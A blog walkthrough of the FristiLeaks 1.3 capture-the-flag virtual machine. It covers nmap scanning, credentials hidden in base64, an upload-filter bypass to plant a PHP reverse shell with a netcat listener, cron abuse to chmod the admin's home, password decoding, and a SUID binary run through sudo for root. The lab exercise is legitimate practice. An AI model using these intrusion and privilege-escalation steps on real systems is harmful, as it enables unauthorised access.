Fristileaks 1.3

The machine can be downloaded here:,133/

Thanks to the guy who built it: Ar0xA

It’s a beginner level Vulnerable machine which was part of some dutch hacking con, and is meant to be solved under 4 hours.

Without further due, let’s delve into it:
Step 1: Lets’ use netdiscover with the following command to find the host

netdiscover -i eth0 -r

Unfortunately this did not work out as, can be seen here:


Step 2: Let’s use nmap, to scan the machine

While booting up the virtual machine, the machine’s IP Adress is visible, which is why I do not consider finding the IP part of the game:

nmap -A -vv -T5 -oN fristileaks

# Nmap 7.60 scan initiated Tue Jan 9 21:37:17 2018 as: nmap -A -vv -T5 -oN fristileaks

Nmap scan report for

Host is up, received arp-response (0.00042s latency).

Scanned at 2018-01-09 21:37:17 GMT for 12s

Not shown: 999 filtered ports

Reason: 990 no-responses and 9 host-prohibited


80/tcp open http syn-ack ttl 64 Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

| http-methods:


|_ Potentially risky methods: TRACE

| http-robots.txt: 3 disallowed entries

|_/cola /sisi /beer

|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Linux 2.6.X|3.X

OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3

OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13

TCP/IP fingerprint:

Uptime guess: 0.011 days (since Tue Jan 9 21:21:55 2018)

So what does this tell us?

There is only port 80 opened on the machine.

There’s an Apache 2.2.15 running on CentOS bundled together with DAV/2 and PHP/5.3.3

The robots.txt reads like this:

User-agent: *

Disallow: /cola

Disallow: /sisi

Disallow: /beer

Those might be interesting links to follow. Let’s see…

Step 3: Visit the webpage, check disallowed pages and sourcecode for hints


Ok, so Fristi is some sort of mixed milkdrink from the netherlands. Honestly I should have looked this up first, otherwise I wouldn’t have been stuck so long on this hint. In my defense, it’s usually quite late when I get to work on my vulnerable machines and after a long day’s work and some time in the gym I might lack some basic creativity.

So all the links (named after drinks, obviously beer and cola, sisi is some dutch speciality, too) mentioned in the robots.txt lead to a page that only contains of the following picture:

Screenshot from 2018-01-11 22-42-31
Yea, the source code on all three pages reveals nothing, too. I think I will just not mention the hour I spent using dirb trying to find other directories of interest.

Also I won’t mention the time I spent using strings, exif and foremost looking to pull any more info from the pictures the webpage gave me.

Even the /colasisibeer directory did not exist.

So if you do not find the obvious you need to look for the obscure. At least that’s what I though at that moment.

So of course the next step was:

Step 4: Looking for exploits with searchsploit

As described above I was quite desperate at that moment, so I found myself two exploits which might fit the bill:

searchsploit Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3

apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | exploits/linux/remote/36663.txt

Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | exploits/linux/webapps/

After spending another 20 minutes trying to understand what they do, I figured this is a beginner VM after all and this is surely not the intended part to take. Also since I did not want to spent more time on this, I did not shoot the exploits without understanding what they do. Think that’s a good rule to hold on to.

Step 5: Help me internet, dammit

So, after all this exploring in the wrong direction I consulted the unending wisdom of the internetz for some help on my lack of creativity here.

The answer was so simple… I swear I will do my basic research up front from now on:

So this is where the admin portal login hid. The picture says it all:


Step 6: Back on track, checking the page source for hints

So after quickly checking for sql injection errors (kinda pointless), I did check the source code, which indeed does look more promising:

1) There is this comment, which contains the username possible eezeepz:

!-- TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz --

2) Also the source code contains two base64 encoded parts. The second part is commented out.

The note above refering to it as junk, so let’s decode it (with encode2 being the part :

cat encode2 | base64 --decode > out.png

The out.png looks like this:

So we got a possible username and this weird string keKkeKKeKKeKkEkkEk saved in a picture. Might as well be the credentials we need. After all this needs to be done in less than four hours.

Step 7: The login does work, we got an upload page


So with the login successful, we are able to upload pics now, possibly also a shell in php, too. So I quickly prepared pentestmonkey’s php shell ( ) and created a netcat listener on my machine:

netcat -vvl -p 8000

So I cannot upload php files directly, the files needs to be a .png, a .jpg or a.gif file. So I change the shell’s name to shell.php.png and here we go:


Step 8: We got shell now! Let’s explore.

By opening we will get a reverse shell on our on listener:


By default I always try this to update the shell to a tty shell, so it’s more easy to use:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/

cd /tmp


After navigating the filesystem a bit I find a note in /var/www/cgi-bin :

hey eezeepz your homedir is a mess, go clean it up, just dont delete

the important stuff.


Following up on this, I found another notes file in /home/eezeepz

Yo EZ,

I made it possible for you to do some automated checks,

but I did only allow you access to /usr/bin/* system binaries. I did

however copy a few extra often needed commands to my

homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those

from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The

output goes to the file "cronresult" in /tmp/. It should

run every minute with my account privileges.

- Jerry

Intrigued. So, chmod is available with the admin user’s privileges? Let’s make the the /home/admin folder accesible to everyone.

cd /tmp

echo "/home/admin/chmod -R 777 /home/admin/" > runthis

Step 9: Let’s browse the admin directory.

cat whoisyourgodnow.txt


Interesting… let’s see.

cat cryptedpass.txt


Ok, so what’s ?


#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn

import base64,codecs,sys

def encodeString(str):

base64string= base64.b64encode(str)

return codecs.encode(base64string[::-1], 'rot13')


print cryptoResult

So, let’s built a little python script, that does the above’s script encoding in reverse. Easy, let’s build the script and decode the whoisyourgodnow.txt on my machine:

import base64,codecs,sys

def decodeString(str):

reverse = (str[::-1])

rot13string = codecs.decode(reverse, 'rot13')

return base64.b64decode(rot13string)

cryptoResult = decodeString(sys.argv[1])

print cryptoResult

Great success, the password looks to be LetThereBeFristi!

Let’s try it!

Step 10: Let’s login as fristigod.

Let’s do this. Why fristigod? Because, besides the eezeepz and the admin dir, there is a fristigod dir in the /home directory.

su - fristigod

As soon as we are fristigod I found this:

cd /var/fristigod/.secret_admin_stuff

There is a SUID executable called doCom with the following permissions:

-rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom

I checked the file with strings:














l$ L



Nice try, but wrong user ;)

Usage: ./program_name terminal_command ...

I tried to execute this, but it did not let me:

sudo ./doCom

[sudo] password for fristigod: LetThereBeFristi!

Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain.

Step 11: Following the lead in the .bash_history file

In the home directory of fristigod I found a bash history file:

cat .bash_history

This looks promising:

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

Let’s just try this then:

bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

bash-4.1# whoami



Boom, root! Let’s wrap this up:

cd /root

cat fristileaks_secrets.txt

Congratulations on beating FristiLeaks 1.0 by Ar0xA []

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1


Despite the first lack of research into what Fristi is, I think I managed to pull this off in about 4 hours. Still, there is a feeling that I cheated on this. Hopefully the next Vulnhub VM will be all my work.

Again, thanks to the Author of Fristileaks and also a shout out to the page, which does a great job hosting all those machines.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s